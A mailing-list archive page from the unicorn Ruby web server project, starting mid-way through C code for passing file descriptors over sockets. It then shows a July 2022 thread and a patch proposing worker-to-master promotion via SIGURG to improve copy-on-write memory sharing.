	AV *fds = (AV *)SvRV(svfds);
	I32 i, nfds = av_len(fds) + 1;
	int *fdp;
	unsigned tries = 0;

	if (SvOK(data)) {
		iov.iov_base = SvPV(data, dlen);
		iov.iov_len = dlen;
	}
	if (!dlen) { /* must be non-zero */
		iov.iov_base = &msg.msg_namelen; /* whatever */
		iov.iov_len = 1;
	}
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	if (nfds) {
		if (nfds > SEND_FD_CAPA) {
			fprintf(stderr, "FIXME: bump SEND_FD_CAPA=%d\n", nfds);
			nfds = SEND_FD_CAPA;
		}
		msg.msg_control = &cmsg.hdr;
		msg.msg_controllen = CMSG_SPACE(nfds * sizeof(int));
		cmsg.hdr.cmsg_level = SOL_SOCKET;
		cmsg.hdr.cmsg_type = SCM_RIGHTS;
		cmsg.hdr.cmsg_len = CMSG_LEN(nfds * sizeof(int));
		fdp = (int *)CMSG_DATA(&cmsg.hdr);
		for (i = 0; i < nfds; i++) {
			SV **fd = av_fetch(fds, i, 0);
			*fdp++ = SvIV(*fd);
		}
	}
	do {
		sent = sendmsg(PerlIO_fileno(s), &msg, flags);
	} while (sent < 0 && sleep_wait(&tries, errno));
	return sent >= 0 ? newSViv(sent) : &PL_sv_undef;
}

void recv_foo(PerlIO *s, SV *buf, STRLEN n)
{
	union my_cmsg cmsg = { 0 };
	struct msghdr msg = { 0 };
	struct iovec iov;
	ssize_t i;
	Inline_Stack_Vars;
	Inline_Stack_Reset;

	if (!SvOK(buf))
		sv_setpvn(buf, "", 0);
	iov.iov_base = SvGROW(buf, n + 1);
	iov.iov_len = n;
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = &cmsg.hdr;
	msg.msg_controllen = CMSG_SPACE(SEND_FD_SPACE);

	i = recvmsg(PerlIO_fileno(s), &msg, 0);
	if (i < 0)
		Inline_Stack_Push(&PL_sv_undef);
	else
		SvCUR_set(buf, i);
	if (i > 0 && cmsg.hdr.cmsg_level == SOL_SOCKET &&
			cmsg.hdr.cmsg_type == SCM_RIGHTS) {
		size_t len = cmsg.hdr.cmsg_len;
		int *fdp = (int *)CMSG_DATA(&cmsg.hdr);
		for (i = 0; CMSG_LEN((i + 1) * sizeof(int)) <= len; i++)
			Inline_Stack_Push(sv_2mortal(newSViv(*fdp++)));
	}
	Inline_Stack_Done;
}

^ permalink raw reply	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  7:40  2%   ` Jean Boussier
@ 2022-07-07 10:23  3%     ` Eric Wong
       [not found]           ` <CANPRWbHTNiEcYq5qhN6Kio8Wg9a+2gXmc2bAcB2oVw4LZv8rcw@mail.gmail.com>
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-07 10:23 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> > OK, any numbers from Puma users which can be used to project
> > improvements for unicorn (and other servers)?
> 
> There are some user reports here: https://github.com/puma/puma/issues/2258
> but they are mixed in reports for two other new featurs.
> 
> Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
> even more from it, given that typical puma users spawn less processes
> than with unicorn.

OK, those numbers sound very good (but I can't view
graphics/screenshots from w3m)

> > > They also include automatic reforking after a predetermined amount
> > > of requests (1k by default).
> >
> > 1k seems like a lot of requests (more on this below)
> 
> Agreed. Shared pages start being invalidated much faster than that.
> 
> > > - master: on `SIGURG`
> > >   - Forward `SIGURG` to a chosen worker.
> >
> > OK, I guess SIGURG is safe to use since nobody else relies on it (right?).
> 
> That's my understanding, an alternative could be to re-use USR2 and have a
> config flag to define wether it is a rexec or refork.

SIGURG is fine, having SIGUSR2 mean two things seems fragile and error-prone

> > Right.  PID file races and corner cases were painful to deal
> > with in the earliest days of this project, and I don't look
> > forward to having to deal with them ever again...
> >
> > It looked like the world was moving towards socket-activation
> > with dedicated process managers and away from fragile PID files;
> > so being self-daemonization dependent seems like a step back.
> 
> Agreed. We're currently running unicorn as PID 1 inside containers
> and I'm not exactly looking forward to have to minitor a PID file.
> 
> Another avenue I explored was to keep the existing master and
> refork from one of the worker like puma, but re-assign the parent
> to the orignal master using PR_SET_CHILD_SUBREAPER.
> 
> Here's my notes of how it works:
> 
> ### Requirements:
> 
> - Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)

I'm fine with requiring Linux for this feature, existing
features need to continue working on *BSD...

> - Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimed for older
>   rubies.

I don't think it's necessary to use FIFOs at all (see below)

> ### Flow:
> 
> - master: set `PR_SET_CHILD_SUBREAPER` during boot.
> - master: create a temporary directory (`$TMP`).
> - master: spawn initial workers the old way.
> 
> - master: on `SIGCHLD` (a child died):
>   - Fake signal oldest worker (`SIGURG`).
>   - Write the new worker number in the fake signal pipe (at the same time).
> 
> - worker: on `SIGURG` (should spawn a sibling):
>   - Note: worker fake signals are processed after the current request is
>     completed.
>   - Run `before_fork` callback (MAYBE: need a special `before_refork`
>     callback?)
>   - create a pipe.
>   - daemonize (fork twice so that the new process is attributed to the
>     nearest `CHILD_SUBREAPER`, aka the original master).
>   - wait for the first child to exit.
>   - write into the pipe to signal the parent is dead.
>   - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

*_fork callbacks already work for your current patch, though, right?;
so hopefully *_refork won't be needed...

> - new sibling after fork:
>   - wait for the parent to exit (though the temporary pipe).
>   - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
>   - create a pidfile at `$TMP/WORKER_NUM.pid`.
>   - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
>     block until the master open in write mode).
>     - NB: Need to convert it to a `Kgio::Pipe` with
>       `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.

sidenote: no need for kgio, I've been meaning to get rid of it
(Ruby 2.3+ has everything we'd need, I think...)

>   - Create the `Unicorn::Worker` instance with that pipe and worker number.
>   - Send `SIGURG` to the parent process (should be the master).
>   - Wait for `SIGCONT` in the named pipe.
>   - enter the worker loop.
> 
> - master: on `SIGURG`:
>   - for each outstanding refork order:
>     - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
>     - Read the pidfile
>     - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
>       - NB: Need to convert it to a `Kgio::Pipe` with
>         `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.
>     - Delete pidfile and named pipe.
>     - Register that new worker normally.
>     - Write `SIGCONT` into the pipe.
> 
> I can share the patch if you are interested, but the extra complexity
> and Linux only features made me prefer the master-promotion approach.

I would prefer this Linux-only approach if it gets rid of PID
files and doesn't introduce new temporary files/FIFOs.

It seems socketpair(..., SOCK_SEQPACKET) can be used for
packetized bidirectional IPC, perhaps with send_io + recv_io iff
necessary.  There shouldn't be any need for new, fragile FS
interactions.


Another idea, have you considered letting master work on some requests?
Signal handling would be delayed, and EINTR handling bugs in
gems could be exposed, but it'd be completely portable...

> > > However it work well enough for demonstration.
> > >
> > > So I figured I'd ask wether the feature is desired upstream
> > > before investing more effort into it.
> >
> > It really depends on:
> >
> > 1) what memory savings and/or speedups can be achieved
> >
> > 2) what support can we expect from you (and other users) for
> >    this feature and potential regressions going forward?
> >
> > I don't have the free time nor mental capacity to deal with
> > fallout from major new features such as this, myself.
> 
> Yeah, this is just a RFC, I wouldn't submit a final patch without
> first deploying it on our infra with good results. I'm just on the
> fence between trying to get this upstream vs maintaining our own
> server that solely work like this, hence somewhat simpler and that
> can make more assumptions.

Of course you also realize unicorn remains culturally-incompatible
with 99.9% of the open source world since I refuse to rely on
graphics drivers to work on a daemon, proprietary software,
terms-of-service, etc...

If anything goes wrong, I'd likely CC you anyways.

> > The hook interface would be yet another documentation+support
> > burden I'm worried about (and also more unicorn-specific stuff
> > to lock people in :<).
> 
> Understandable. I suppose it can be done with a monitoring process.
> Check `smaps_rollup` and send `SIGURG` when deemed necessary.
> 
> More moving pieces but keep unicorn simpler.

*shrug*  I've also been favoring more vertical integration in
other places to keep the overall stack simpler.

It depends on whether the monitoring process/library can work
with other Rack servers, probably; and signal compatibility.

> > A completely different idea which should achieve the same goal,
> > completely independent of unicorn:
> >
> >   App startup/loading can be made to trigger warmup paths which
> >   hit common endpoints.  IOW, app loading could run a small
> >   warmup suite which simulates common requests to heat up caches
> >   and trigger JIT.
> 
> Yeah, I don't really believe in this for a few reasons:
> 
>   - That would slow boot time.

Yes, and startup time is already a nasty thing, anyways...

>   - On large apps there's just too many codepath for this to be realistic.

I was thinking a lazy solution could be to have some middleware
measure coverage and log requests to support auto-replay, somehow.

>   - Many endpoints require database and other network access you probably
>     don't want in the master.

Wouldn't the *_fork hooks handle that, anyways?

>   - Endpoints may have side effects.

Yeah, this would optimize the GET endpoints, at least.
Not sure what percentage of POST needs to be optimized...

> > Ultimately (long-term for ruby-core), it would be better to make
> > JIT (and perhaps even VM cache) results persistent and shareable
> > across different processes, somehow...  That would help all Ruby
> > tools, even short-lived CLI tools.  Portable locking would be a
> > pain, I suppose, but proprietary OSes are always a pain :P
> 
> Based on my limited understanding of both JIT and VM caches, I don't think
> that's really possible.

Ugh, I still think it can be made possible, somehow.  But I no longer
use Ruby for new projects...

> The VM itself could definitely do better CoW wise, and I have some proposals
> on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
> time and will never be perfect.
> 
> That's why I think periodically promoting a new master has potential.
> 
> > There's some line-wrapping issues caused by your MUA;
> 
> Urk. Ok, trying another client now, and I'll resend the patch.

Nope, still wrapped.  According to the git-format-patch(1) manpage,
Thunderbird can work w/o extensions, actually.

IME attachments might work mostly well, nowadays (test sending
to yourself and using "git am" to apply, first, of course).
Most on vger will disagree with me on attachments, though...

"git send-email" and "git imap-send" remain the recommended
options, but mutt works well, too.

> > Perhaps documenting this as experimental and subject to removal
> > at any time would make the addition of a major new feature an
> > easier pill to swallow; but I still think this is better outside
> > of app servers.
> 
> Up to you, if you don't feel like maintaining such a feature I would
> perfectly understand.

I'm fine with "maintaining it" if it just means Cc-ing you on
bugs related to this :>

^ permalink raw reply	[relevance 3%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  2022-07-06  2:33  3% ` Eric Wong
@ 2022-07-06  7:40  2%   ` Jean Boussier
  2022-07-07 10:23  3%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Jean Boussier @ 2022-07-06  7:40 UTC (permalink / raw)
  Cc: unicorn-public

> OK, any numbers from Puma users which can be used to project
> improvements for unicorn (and other servers)?

There are some user reports here: https://github.com/puma/puma/issues/2258
but they are mixed in reports for two other new featurs.

Some reports are up to 20-30% savings, but I'd expect unicorn to benefit
even more from it, given that typical puma users spawn less processes
than with unicorn.

> > They also include automatic reforking after a predetermined amount
> > of requests (1k by default).
>
> 1k seems like a lot of requests (more on this below)

Agreed. Shared pages start being invalidated much faster than that.

> > - master: on `SIGURG`
> >   - Forward `SIGURG` to a chosen worker.
>
> OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

That's my understanding, an alternative could be to re-use USR2 and have a
config flag to define wether it is a rexec or refork.

> Right.  PID file races and corner cases were painful to deal
> with in the earliest days of this project, and I don't look
> forward to having to deal with them ever again...
>
> It looked like the world was moving towards socket-activation
> with dedicated process managers and away from fragile PID files;
> so being self-daemonization dependent seems like a step back.

Agreed. We're currently running unicorn as PID 1 inside containers
and I'm not exactly looking forward to have to minitor a PID file.

Another avenue I explored was to keep the existing master and
refork from one of the worker like puma, but re-assign the parent
to the orignal master using PR_SET_CHILD_SUBREAPER.

Here's my notes of how it works:

### Requirements:

- Need `PR_SET_CHILD_SUBREAPER`, so Linux 3.4+ only (May 2012)
- Need `File.mkfifo`, so Ruby 2.3 (Dec 2015), but can be shimed for older
  rubies.

### Flow:

- master: set `PR_SET_CHILD_SUBREAPER` during boot.
- master: create a temporary directory (`$TMP`).
- master: spawn initial workers the old way.

- master: on `SIGCHLD` (a child died):
  - Fake signal oldest worker (`SIGURG`).
  - Write the new worker number in the fake signal pipe (at the same time).

- worker: on `SIGURG` (should spawn a sibling):
  - Note: worker fake signals are processed after the current request is
    completed.
  - Run `before_fork` callback (MAYBE: need a special `before_refork`
    callback?)
  - create a pipe.
  - daemonize (fork twice so that the new process is attributed to the
    nearest `CHILD_SUBREAPER`, aka the original master).
  - wait for the first child to exit.
  - write into the pipe to signal the parent is dead.
  - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

- new sibling after fork:
  - wait for the parent to exit (though the temporary pipe).
  - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
  - create a pidfile at `$TMP/WORKER_NUM.pid`.
  - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
    block until the master open in write mode).
    - NB: Need to convert it to a `Kgio::Pipe` with
      `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.
  - Create the `Unicorn::Worker` instance with that pipe and worker number.
  - Send `SIGURG` to the parent process (should be the master).
  - Wait for `SIGCONT` in the named pipe.
  - enter the worker loop.

- master: on `SIGURG`:
  - for each outstanding refork order:
    - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
    - Read the pidfile
    - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
      - NB: Need to convert it to a `Kgio::Pipe` with
        `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.
    - Delete pidfile and named pipe.
    - Register that new worker normally.
    - Write `SIGCONT` into the pipe.

I can share the patch if you are interested, but the extra complexity
and Linux only features made me prefer the master-promotion approach.

> > However it work well enough for demonstration.
> >
> > So I figured I'd ask wether the feature is desired upstream
> > before investing more effort into it.
>
> It really depends on:
>
> 1) what memory savings and/or speedups can be achieved
>
> 2) what support can we expect from you (and other users) for
>    this feature and potential regressions going forward?
>
> I don't have the free time nor mental capacity to deal with
> fallout from major new features such as this, myself.

Yeah, this is just a RFC, I wouldn't submit a final patch without
first deploying it on our infra with good results. I'm just on the
fence between trying to get this upstream vs maintaining our own
server that solely work like this, hence somewhat simpler and that
can make more assumptions.

> The hook interface would be yet another documentation+support
> burden I'm worried about (and also more unicorn-specific stuff
> to lock people in :<).

Understandable. I suppose it can be done with a monitoring process.
Check `smaps_rollup` and send `SIGURG` when deemed necessary.

More moving pieces but keep unicorn simpler.

> A completely different idea which should achieve the same goal,
> completely independent of unicorn:
>
>   App startup/loading can be made to trigger warmup paths which
>   hit common endpoints.  IOW, app loading could run a small
>   warmup suite which simulates common requests to heat up caches
>   and trigger JIT.

Yeah, I don't really believe in this for a few reasons:

  - That would slow boot time.
  - On large apps there's just too many codepath for this to be realistic.
  - Many endpoints require database and other network access you probably
    don't want in the master.
  - Endpoints may have side effects.

> Ultimately (long-term for ruby-core), it would be better to make
> JIT (and perhaps even VM cache) results persistent and shareable
> across different processes, somehow...  That would help all Ruby
> tools, even short-lived CLI tools.  Portable locking would be a
> pain, I suppose, but proprietary OSes are always a pain :P

Based on my limited understanding of both JIT and VM caches, I don't think
that's really possible.

The VM itself could definitely do better CoW wise, and I have some proposals
on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
time and will never be perfect.

That's why I think periodically promoting a new master has potential.

> There's some line-wrapping issues caused by your MUA;

Urk. Ok, trying another client now, and I'll resend the patch.

> Perhaps documenting this as experimental and subject to removal
> at any time would make the addition of a major new feature an
> easier pill to swallow; but I still think this is better outside
> of app servers.

Up to you, if you don't feel like maintaining such a feature I would
perfectly understand.

---
 SIGNALS                        |   4 ++
 lib/unicorn.rb                 |   2 +-
 lib/unicorn/http_server.rb     | 115 +++++++++++++++++++++++++--------
 lib/unicorn/promoted_worker.rb |  40 ++++++++++++
 4 files changed, 134 insertions(+), 27 deletions(-)
 create mode 100644 lib/unicorn/promoted_worker.rb

diff --git a/SIGNALS b/SIGNALS
index 7321f2b..f5716b9 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
 * WINCH - gracefully stops workers but keep the master running.
   This will only work for daemonized processes.

+* URG - promote one of the existing workers as a new master, and gracefully
+  stop workers.
+  This will only work for daemonized processes.
+
 * TTIN - increment the number of worker processes by one

 * TTOU - decrement the number of worker processes by one
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..832f78d 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -133,6 +133,6 @@ def self.pipe # :nodoc:
 # :enddoc:

 %w(const socket_helper stream_input tee_input http_request configurator
-   tmpio util http_response worker http_server).each do |s|
+   tmpio util http_response worker promoted_worker http_server).each do |s|
   require_relative "unicorn/#{s}"
 end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..dd8f021 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -50,6 +50,7 @@ class Unicorn::HttpServer
   #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.3.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map(&:dup),
+    :generation => 0,
     0 => $0.dup,
   }
   # We favor ENV['PWD'] since it is (usually) symlink aware for Capistrano
@@ -106,7 +107,7 @@ def initialize(app, options = {})
     @orig_app = app
     # list of signals we care about and trap in master.
     @queue_sigs = [
-      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU ]
+      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU, :URG ]

     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
@@ -119,7 +120,24 @@ def initialize(app, options = {})

   # Runs the thing.  Returns self so you can run join on it
   def start
+    @new_master = false
     inherit_listeners!
+    promote
+
+    # write pid early for Mongrel compatibility if we're not inheriting sockets
+    # This is needed for compatibility some Monit setups at least.
+    # This unfortunately has the side effect of clobbering valid PID if
+    # we upgrade and the upgrade breaks during preload_app==true && build_app!
+    self.pid = config[:pid]
+
+    build_app! if preload_app
+    bind_new_listeners!
+
+    spawn_missing_workers
+    self
+  end
+
+  def promote
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
     @self_pipe.replace(Unicorn.pipe)
@@ -130,18 +148,6 @@ def start
     # Note that signals don't actually get handled until the #join method
     @queue_sigs.each { |sig| trap(sig) { @sig_queue << sig; awaken_master } }
     trap(:CHLD) { awaken_master }
-
-    # write pid early for Mongrel compatibility if we're not inheriting sockets
-    # This is needed for compatibility some Monit setups at least.
-    # This unfortunately has the side effect of clobbering valid PID if
-    # we upgrade and the upgrade breaks during preload_app==true && build_app!
-    self.pid = config[:pid]
-
-    build_app! if preload_app
-    bind_new_listeners!
-
-    spawn_missing_workers
-    self
   end

   # replaces current listener set with +listeners+.  This will
@@ -178,16 +184,16 @@ def logger=(obj)
     Unicorn::HttpRequest::DEFAULTS["rack.logger"] = @logger = obj
   end

-  def clobber_pid(path)
+  def clobber_pid(path, content = $$)
     unlink_pid_safe(@pid) if @pid
     if path
       fp = begin
-        tmp = "#{File.dirname(path)}/#{rand}.#$$"
+        tmp = "#{File.dirname(path)}/#{rand}.#{content}"
         File.open(tmp, File::RDWR|File::CREAT|File::EXCL, 0644)
       rescue Errno::EEXIST
         retry
       end
-      fp.syswrite("#$$\n")
+      fp.syswrite("#{content}\n")
       File.rename(fp.path, path)
       fp.close
     end
@@ -279,6 +285,11 @@ def join
       end
       @ready_pipe = @ready_pipe.close rescue nil
     end
+
+    if @promoted
+      Process.kill(:WINCH, Process.ppid)
+    end
+
     begin
       reap_all_workers
       case @sig_queue.shift
@@ -292,6 +303,13 @@ def join
           @logger.debug("waiting #{sleep_time}s after suspend/hibernation")
         end
         maintain_worker_count if respawn
+
+        if @new_master && @new_master.ready? && @workers.empty?
+          # TODO: we should handle the new master dying like with reexec.
+          clobber_pid(pid, @new_master.pid)
+          break
+        end
+
         master_sleep(sleep_time)
       when :QUIT # graceful shutdown
         break
@@ -305,10 +323,20 @@ def join
         soft_kill_each_worker(:USR1)
       when :USR2 # exec binary, stay alive in case something went wrong
         reexec
+      when :URG
+        if $stdin.tty?
+          logger.info "SIGURG ignored because we're not daemonized"
+        else
+          promote_new_master
+        end
       when :WINCH
         if $stdin.tty?
           logger.info "SIGWINCH ignored because we're not daemonized"
         else
+          if @new_master
+            @new_master.ready!
+          end
+
           respawn = false
           logger.info "gracefully stopping all workers"
           soft_kill_each_worker(:QUIT)
@@ -408,11 +436,30 @@ def reap_all_workers
         worker = @workers.delete(wpid) and worker.close rescue nil
         @after_worker_exit.call(self, worker, status)
       end
+
+      if @new_master && @new_master.ready?
+        @new_master.scale(@workers.size)
+      end
     rescue Errno::ECHILD
       break
     end while true
   end

+  def promote_new_master
+    # Promoting the oldest worker
+    # TODO: handle `@new_master` being dead.
+    if @new_master
+      logger.error "can't promote because worker=#{@new_master.nr} is
being promoted"
+    elsif pair = @workers.first
+      @new_master = Unicorn::PromotedWorker.new(*pair, worker_processes)
+      @workers.delete(@new_master.pid)
+      logger.info "master promoting worker=#{@new_master.worker.nr}"
+      @new_master.promote
+    else
+      logger.error "can't promote because there is no existing workers"
+    end
+  end
+
   # reexecutes the START_CTX with a new binary
   def reexec
     if @reexec_pid > 0
@@ -516,10 +563,11 @@ def murder_lazy_workers
   end

   def after_fork_internal
+    self.worker_processes = 0
     @self_pipe.each(&:close).clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
-    @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
+    @ready_pipe = nil

     # The OpenSSL PRNG is seeded with only the pid, and apps with frequently
     # dying workers can recycle pids
@@ -545,6 +593,13 @@ def spawn_missing_workers
       unless pid
         after_fork_internal
         worker_loop(worker)
+
+        if @promoted
+          worker.tick = 0
+          promote
+          join
+        end
+
         exit
       end

@@ -678,19 +733,22 @@ def init_worker_process(worker)
     trap(:CHLD, 'DEFAULT')
     @sig_queue.clear
     proc_name "worker[#{worker.nr}]"
-    START_CTX.clear
     @workers.clear

     after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.close_on_exec = true }

     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    @config = nil
     build_app! unless preload_app
-    @after_fork = @listener_opts = @orig_app = nil
+    @listener_opts = @orig_app = nil
     readers = LISTENERS.dup
     readers << worker
     trap(:QUIT) { nuke_listeners!(readers) }
+    @promoted = false
+    trap(:URG) do
+      @promoted = true
+      START_CTX[:generation] += 1
+    end
     readers
   end

@@ -706,11 +764,11 @@ def reopen_worker_logs(worker_nr)

   def prep_readers(readers)
     wtr = Unicorn::Waiter.prep_readers(readers)
-    @timeout *= 500 # to milliseconds for epoll, but halved
+    @select_timeout = @timeout * 500 # to milliseconds for epoll, but halved
     wtr
   rescue
     require_relative 'select_waiter'
-    @timeout /= 2.0 # halved for IO.select
+    @select_timeout = @timeout / 2.0 # halved for IO.select
     Unicorn::SelectWaiter.new
   end

@@ -720,7 +778,7 @@ def prep_readers(readers)
   def worker_loop(worker)
     readers = init_worker_process(worker)
     waiter = prep_readers(readers)
-    reopen = false
+    promote = reopen = false

     # this only works immediately if the master sent us the signal
     # (which is the normal case)
@@ -739,12 +797,17 @@ def worker_loop(worker)
           process_client(client)
           worker.tick = time_now.to_i
         end
+        if @promoted
+          worker.tick = time_now.to_i
+          return
+        end
+
         break if reopen
       end

       # timeout so we can .tick and keep parent from SIGKILL-ing us
       worker.tick = time_now.to_i
-      waiter.get_readers(ready, readers, @timeout)
+      waiter.get_readers(ready, readers, @select_timeout)
     rescue => e
       redo if reopen && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
@@ -823,8 +886,8 @@ def build_app!
   end

   def proc_name(tag)
-    $0 = ([ File.basename(START_CTX[0]), tag
-          ]).concat(START_CTX[:argv]).join(' ')
+    $0 = ([ File.basename(START_CTX[0]), tag, "(gen:
#{START_CTX[:generation]})",
+          ]).concat(START_CTX[:argv]).compact.join(' ')
   end

   def redirect_io(io, path)
diff --git a/lib/unicorn/promoted_worker.rb b/lib/unicorn/promoted_worker.rb
new file mode 100644
index 0000000..2595182
--- /dev/null
+++ b/lib/unicorn/promoted_worker.rb
@@ -0,0 +1,40 @@
+# -*- encoding: binary -*-
+
+class Unicorn::PromotedWorker
+  attr_reader :pid, :worker
+
+  def initialize(pid, worker, expected_worker_processes)
+    @pid = pid
+    @worker = worker
+    @worker_processes = 0
+    @expected_worker_processes = expected_worker_processes
+    @ready = false
+  end
+
+  def ready?
+    @ready
+  end
+
+  def ready!
+    @ready = true
+  end
+
+  def promote
+    @worker.soft_kill(:URG)
+  end
+
+  def scale(old_master_worker_processes)
+    diff = @expected_worker_processes -
+      old_master_worker_processes -
+      @worker_processes
+
+    if diff > 0
+      diff.times { kill(:TTIN) }
+      @worker_processes += diff
+    end
+  end
+
+  def kill(sig)
+    Process.kill(sig, @pid)
+  end
+end
-- 
2.35.1

^ permalink raw reply related	[relevance 2%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  @ 2022-07-06  2:33  3% ` Eric Wong
  2022-07-06  7:40  2%   ` Jean Boussier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-06  2:33 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Unicorn rely on Copy on Write to limit applications' memory usage,
> however Ruby Copy on Write performance isn't exactly perfect.
> As code get executed various internal performance caches get warmed
> which cause shared pages to be invalidated.
> 
> While there's certainly some improvements to be made to Ruby itself
> on that front, it will likely get worse in the near future if YJIT
> become popular, as it will generate executable code in the workers
> hence won't be shared.
> 
> One way effective CoW performance could be improved would be to
> periodically promote one worker as the new master. Since that worker
> processed some requests, VM caches, JITed code, etc should be somewhat
> warm already, hence shared pages should be dirtied less frequently after
> each promotion.

Agreed, there's potential for savings, here...

> Puma 5.0.0 introduced a similar experimental feature called
> `fork_worker` or `refork`.
> 
> It's a bit more limited though, as instead of promoting a new
> master and exiting, they only ask worker #0 to fork itself to
> replace its siblings. So once all workers are replaces, there
> is 3 levels of processes: cluster -> first_worker -> other_workers.

OK, any numbers from Puma users which can be used to project
improvements for unicorn (and other servers)?

> They also include automatic reforking after a predetermined amount
> of requests (1k by default).

1k seems like a lot of requests (more on this below)

> The happy path works pretty much like this:
> 
> - Assume daemonized mode.
> 
> - master: on `SIGURG`
>   - Forward `SIGURG` to a chosen worker.

OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

> - worker: on `SIGURG` (become a master)
>   - do the prep, register traps, open self-pipe, etc
>   - don't spawn any worker, set number of wokers to 0.
>   - send `SIGWHINCH` to master.
> 
> - old master: on `SIGWHINCH`
>   - Gracefully shutdown workers, like during a reexec.

nit: only one `H' in `SIGWINCH`

> - old master: when a worker is reaped.
>   - Send `SIGTTIN` to the new master
>   - If it was the last worker:
>     - replace pidfile
>     - exit
> 
> This patch is not exactly production quality yet:
> 
>   - I need to write some tests
>   - There's a race condition that can cause the promoted master
>     master to have one less worker than required. Need to be addressed.
>   - The pidfile replacement should be improved.
>   - Multiple corner cases like a `QUIT` during promotion are not handled.

Right.  PID file races and corner cases were painful to deal
with in the earliest days of this project, and I don't look
forward to having to deal with them ever again...

It looked like the world was moving towards socket-activation
with dedicated process managers and away from fragile PID files;
so being self-daemonization dependent seems like a step back.

> However it work well enough for demonstration.
> 
> So I figured I'd ask wether the feature is desired upstream
> before investing more effort into it.

It really depends on:

1) what memory savings and/or speedups can be achieved

2) what support can we expect from you (and other users) for
   this feature and potential regressions going forward?

I don't have the free time nor mental capacity to deal with
fallout from major new features such as this, myself.

> For this to be used in production without too much integration effort
> I think automatic promotion based on some criteria like number of
> request or process lifetime would be needed.
> 
> Ideally a hook interface to programatically trigger promotion would
> be very valuable as I'd likely want to trigger promotion
> based on memory metrics read from `/proc/<pid>/smaps_rollup`.

The hook interface would be yet another documentation+support
burden I'm worried about (and also more unicorn-specific stuff
to lock people in :<).


A completely different idea which should achieve the same goal,
completely independent of unicorn:

  App startup/loading can be made to trigger warmup paths which
  hit common endpoints.  IOW, app loading could run a small
  warmup suite which simulates common requests to heat up caches
  and trigger JIT.

  That would be completely self-contained in each app and work
  on every single app server; not just ones with special
  provisions to deal with this.  Of course, CoW-aware setups
  (preload_app) will still have the advantage, here.

  Best of all, it could be deterministic, too, instead of
  waiting and hoping 1k random requests will be sufficient
  warmup, developers can tune and mock exactly the requests
  required for warmup.  Of course, a lazy developer replay 1k
  requests from an old log, too.


Ultimately (long-term for ruby-core), it would be better to make
JIT (and perhaps even VM cache) results persistent and shareable
across different processes, somehow...  That would help all Ruby
tools, even short-lived CLI tools.  Portable locking would be a
pain, I suppose, but proprietary OSes are always a pain :P

>  4 files changed, 134 insertions(+), 27 deletions(-)
>  create mode 100644 lib/unicorn/promoted_worker.rb

There's some line-wrapping issues caused by your MUA;
I got this from "git am":

  warning: Patch sent with format=flowed; space at the end of lines might be lost.
  Applying: Master promotion with SIGURG (CoW optimization)
  error: corrupt patch at line 14

The git-format-patch(1) manpage has a section for Thunderbird users
which may help.

> --- a/SIGNALS
> +++ b/SIGNALS
> @@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
>  * WINCH - gracefully stops workers but keep the master running.
>    This will only work for daemonized processes.
> 
> +* URG - promote one of the existing workers as a new master, and gracefully
> +  stop workers.
> +  This will only work for daemonized processes.

Perhaps documenting this as experimental and subject to removal
at any time would make the addition of a major new feature an
easier pill to swallow; but I still think this is better outside
of app servers.

^ permalink raw reply	[relevance 3%]

* Re: Potential Unicorn vulnerability
